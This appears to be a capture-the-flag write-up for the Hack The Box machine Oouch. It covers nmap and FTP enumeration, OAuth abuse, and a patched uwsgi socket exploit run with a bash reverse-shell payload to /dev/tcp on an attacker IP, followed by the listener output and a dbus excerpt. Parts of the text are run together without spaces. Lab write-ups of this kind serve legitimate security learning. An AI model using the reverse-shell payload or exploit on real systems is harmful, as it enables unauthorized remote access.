Oouch is one of the hard (close to Insane) boxes that will give you a lot of fun but also tons of frustration with a big dose of new technologies and web techniques. Prepare to study, investigate and get fun.
Enum
Port scans
As with every box, first is to execute some Nmap to discover open ports and execute basic script against those.
RunningscriptwithtargetOouch/10.10.10.177[*] Creating directory Oouch structure[*] Running NMAP all ports to 10.10.10.177StartingNmap7.80 ( https://nmap.org ) at 2020-05-15 16:21 CESTInitiatingPingScanat16:21Scanning10.10.10.177 [2 ports]CompletedPingScanat16:21,0.04selapsed (1 totalhosts)InitiatingConnectScanat16:21Scanning10.10.10.177 [65535 ports]Discoveredopenport22/tcpon10.10.10.177Discoveredopenport21/tcpon10.10.10.177Discoveredopenport8000/tcpon10.10.10.177CompletedConnectScanat16:21,12.86selapsed (65535 totalports)Nmapscanreportfor10.10.10.177Hostisup (0.040s latency).Notshown:64978closedports,554filteredportsSomeclosedportsmaybereportedasfiltereddueto--defeat-rst-ratelimitPORTSTATESERVICE21/tcpopenftp22/tcpopenssh8000/tcpopenhttp-altReaddatafilesfrom:/usr/bin/../share/nmapNmapdone:1IPaddress (1 hostup) scanned in 12.94 seconds
[*] Running NMAP scripts to open portsStartingNmap7.80 ( https://nmap.org ) at 2020-05-15 16:21 CESTWARNING:Service10.10.10.177:8000hadalreadysoft-matchedrtsp,butnowsoft-matchedsip; ignoringsecondvalueNmapscanreportfor10.10.10.177Hostisup (0.040s latency).PORTSTATESERVICEVERSION21/tcpopenftpvsftpd2.0.8orlater|ftp-anon:AnonymousFTPloginallowed (FTP code230)|_-rw-r--r--1ftpftp49Feb1119:34project.txt|ftp-syst:|STAT:|FTPserverstatus:|Connectedto10.10.14.34|Loggedinasftp|TYPE:ASCII|Sessionbandwidthlimitinbyte/sis30000|Sessiontimeoutinsecondsis300|Controlconnectionisplaintext|Dataconnectionswillbeplaintext|Atsessionstartup,clientcountwas4|vsFTPd3.0.3-secure,fast,stable|_Endofstatus22/tcpopensshOpenSSH7.9p1Debian10+deb10u2 (protocol 2.0)|ssh-hostkey:|20488d:6b:a7:2b:7a:21:9f:21:11:37:11:ed:50:4f:c6:1e (RSA)|_256d2:af:55:5c:06:0b:60:db:9c:78:47:b5:ca:f4:f1:04 (ED25519)8000/tcpopenrtsp|fingerprint-strings:|FourOhFourRequest,GetRequest,HTTPOptions:|HTTP/1.0400BadRequest|Content-Type:text/html|Vary:Authorization|<h1>BadRequest (400)</h1>|RTSPRequest:|RTSP/1.0400BadRequest|Content-Type:text/html|Vary:Authorization|<h1>BadRequest (400)</h1>|SIPOptions:|SIP/2.0400BadRequest|Content-Type:text/html|Vary:Authorization|_<h1>BadRequest (400)</h1>|_http-title:Sitedoesn't have a title (text/html).|_rtsp-methods: ERROR: Script execution failed (use -d to debug)1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port8000-TCP:V=7.80%I=7%D=5/15%Time=5EBEA581%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,64,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20texSF:t/html\r\nVary:\x20Authorization\r\n\r\n<h1>Bad\x20Request\x20\(400\)</SF:h1>")%r(FourOhFourRequest,64,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nConSF:tent-Type:\x20text/html\r\nVary:\x20Authorization\r\n\r\n<h1>Bad\x20ReqSF:uest\x20\(400\)</h1>")%r(HTTPOptions,64,"HTTP/1\.0\x20400\x20Bad\x20ReqSF:uest\r\nContent-Type:\x20text/html\r\nVary:\x20Authorization\r\n\r\n<h1SF:>Bad\x20Request\x20\(400\)</h1>")%r(RTSPRequest,64,"RTSP/1\.0\x20400\x2SF:0Bad\x20Request\r\nContent-Type:\x20text/html\r\nVary:\x20AuthorizationSF:\r\n\r\n<h1>Bad\x20Request\x20\(400\)</h1>")%r(SIPOptions,63,"SIP/2\.0\SF:x20400\x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nVary:\x20AuthSF:orization\r\n\r\n<h1>Bad\x20Request\x20\(400\)</h1>");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 18.89 seconds xnaaro:parrot /media/xnaaro/SSD/hackthebox/machines
After initial enumeration I've found out -T5 with Nmap missed a port, so built a script to enumerate ports with netcat. Here are the results with a new port (5000) discovered
Discovered a vhost called authorization, then fuzzed it to discover other internal paths and files a unauthenticated and then with an authenticated cookie.
Nmap gave as an FTP port opened with anonymous enabled, on the FTP there was only a file called project.txt with the following contents.
$ cat project.txt
Flask -> Consumer
Django -> Authorization Server
This gave us an idea of what the server is running and what could be the vhosts names
authorization.oouch.htb
consumer.oouch.htb
Abusing Oauth for foothold
Once tried some user creation, login, authorizations, etc. I understood the behaviour and the technology behind all of this, in this case was Oauth2. This box gave me the opportunity to study this technology with some blogs and an Udemy course.
Once we have a token and a cookie on authorization, get can get ssh information about qtc user, as Chris mentioned in the /documentation, copy the ssh_key into a file.
The exploit needs to be fixed for python3 compatibility, change sz function as follows:
# Originaldefsz(x): s =hex(x ifisinstance(x, int) elselen(x))[2:].rjust(4, '0')if sys.version_info[0]==3:importbytes s =bytes.fromhex(s)if sys.version_info[0]==3else s.decode('hex')return s[::-1]# Fixeddefsz(x): s =hex(x ifisinstance(x, int) elselen(x))[2:].rjust(4, '0') s =bytes.fromhex(s)return s[::-1]
This container does not have netcat, wget or curl installed. You could use ftp or as I did, encode the exploit as base64 in your host and decode inside the box.
Open a netcat listener in your host or in oouch box, and execute the exploit.
```sh
qtc@aeb4525789d8:/tmp$ python exploit.py -m unix -u uwsgi.socket -c "bash -c 'bash -i >& /dev/tcp/10.10.14.34/4443 0>&1'"
[*]Sending payload.
This will give us a shell as www-data on the container.
$rlwrapnc-nvlp4443Ncat:Version7.80 ( https://nmap.org/ncat )Ncat:Listeningon:::4443Ncat:Listeningon0.0.0.0:4443Ncat:Connectionfrom10.10.10.177.Ncat:Connectionfrom10.10.10.177:51688.bash:cannotsetterminalprocessgroup (4895): Inappropriate ioctl for devicebash:nojobcontrolinthisshellbash:/root/.bashrc:Permissiondeniedwww-data@aeb4525789d8:/code$
Root
During previous enumeration on /code and some code review, we saw what .note.txt said about dbus.
Abusing DBUS
This is a excerpt of the vulnerable implementation found at /code/oouch/.
www-data@aeb4525789d8:/code$ cat oouch/routes.py | grep buscat oouch/routes.py | grep busimport dbus The contact page is required to abuse the Oauth vulnerabilities. This endpoint allows the user to send messages using a textfield. bus = dbus.SystemBus() block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') bus.close()
This box was specially fun and frustrating, made me learn Oauth and investigate about dbus and uwsgi. Also good practice for csrf and ssrf techniques. Hope you enjoyed the whole process.